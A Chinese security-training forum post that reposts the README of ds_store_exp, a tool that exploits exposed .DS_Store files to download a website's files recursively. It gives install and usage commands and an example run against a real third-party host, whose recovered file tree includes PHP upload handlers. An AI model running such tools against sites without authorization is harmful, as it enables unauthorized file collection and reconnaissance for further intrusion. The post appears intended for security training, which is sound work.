找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 164|回复: 0

.DS_Store文件泄露利用工具

[复制链接]

91

主题

0

回帖

371

积分

管理员

积分
371
发表于 2025-5-24 16:05:45 | 显示全部楼层 |阅读模式
.DS_Store文件泄露利用工具


ds_store_exp
A .DS_Store file disclosure exploit.

It parses .DS_Store file and downloads files recursively.

这是一个 .DS_Store 文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地。

Usage: python ds_store_exp.py http://www.example.com/.DS_Store
Install
  1. pip install ds-store requests
复制代码


Example
  1. ds_store_exp.py http://hd.zj.qq.com/themes/galaxyw/.DS_Store

  2. hd.zj.qq.com/
  3. └── themes
  4.     └── galaxyw
  5.         ├── app
  6.         │   └── css
  7.         │       └── style.min.css
  8.         ├── cityData.min.js
  9.         ├── images
  10.         │   └── img
  11.         │       ├── bg-hd.png
  12.         │       ├── bg-item-activity.png
  13.         │       ├── bg-masker-pop.png
  14.         │       ├── btn-bm.png
  15.         │       ├── btn-login-qq.png
  16.         │       ├── btn-login-wx.png
  17.         │       ├── ico-add-pic.png
  18.         │       ├── ico-address.png
  19.         │       ├── ico-bm.png
  20.         │       ├── ico-duration-time.png
  21.         │       ├── ico-pop-close.png
  22.         │       ├── ico-right-top-delete.png
  23.         │       ├── page-login-hd.png
  24.         │       ├── pic-masker.png
  25.         │       └── ticket-selected.png
  26.         └── member
  27.             ├── assets
  28.             │   ├── css
  29.             │   │   ├── ace-reset.css
  30.             │   │   └── antd.css
  31.             │   └── lib
  32.             │       ├── cityData.min.js
  33.             │       └── ueditor
  34.             │           ├── index.html
  35.             │           ├── lang
  36.             │           │   └── zh-cn
  37.             │           │       ├── images
  38.             │           │       │   ├── copy.png
  39.             │           │       │   ├── localimage.png
  40.             │           │       │   ├── music.png
  41.             │           │       │   └── upload.png
  42.             │           │       └── zh-cn.js
  43.             │           ├── php
  44.             │           │   ├── action_crawler.php
  45.             │           │   ├── action_list.php
  46.             │           │   ├── action_upload.php
  47.             │           │   ├── config.json
  48.             │           │   ├── controller.php
  49.             │           │   └── Uploader.class.php
  50.             │           ├── ueditor.all.js
  51.             │           ├── ueditor.all.min.js
  52.             │           ├── ueditor.config.js
  53.             │           ├── ueditor.parse.js
  54.             │           └── ueditor.parse.min.js
  55.             └── static
  56.                 ├── css
  57.                 │   └── page.css
  58.                 ├── img
  59.                 │   ├── bg-table-title.png
  60.                 │   ├── bg-tab-say.png
  61.                 │   ├── ico-black-disabled.png
  62.                 │   ├── ico-black-enabled.png
  63.                 │   ├── ico-coorption-person.png
  64.                 │   ├── ico-miss-person.png
  65.                 │   ├── ico-mr-person.png
  66.                 │   ├── ico-white-disabled.png
  67.                 │   └── ico-white-enabled.png
  68.                 └── scripts
  69.                     ├── js
  70.                     └── lib
  71.                         └── jquery.min.js
复制代码

下载地址 https://github.com/lijiejie/ds_store_exp
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|暗月安全培训论坛

GMT+8, 2026-1-9 12:03 , Processed in 0.061315 second(s), 19 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表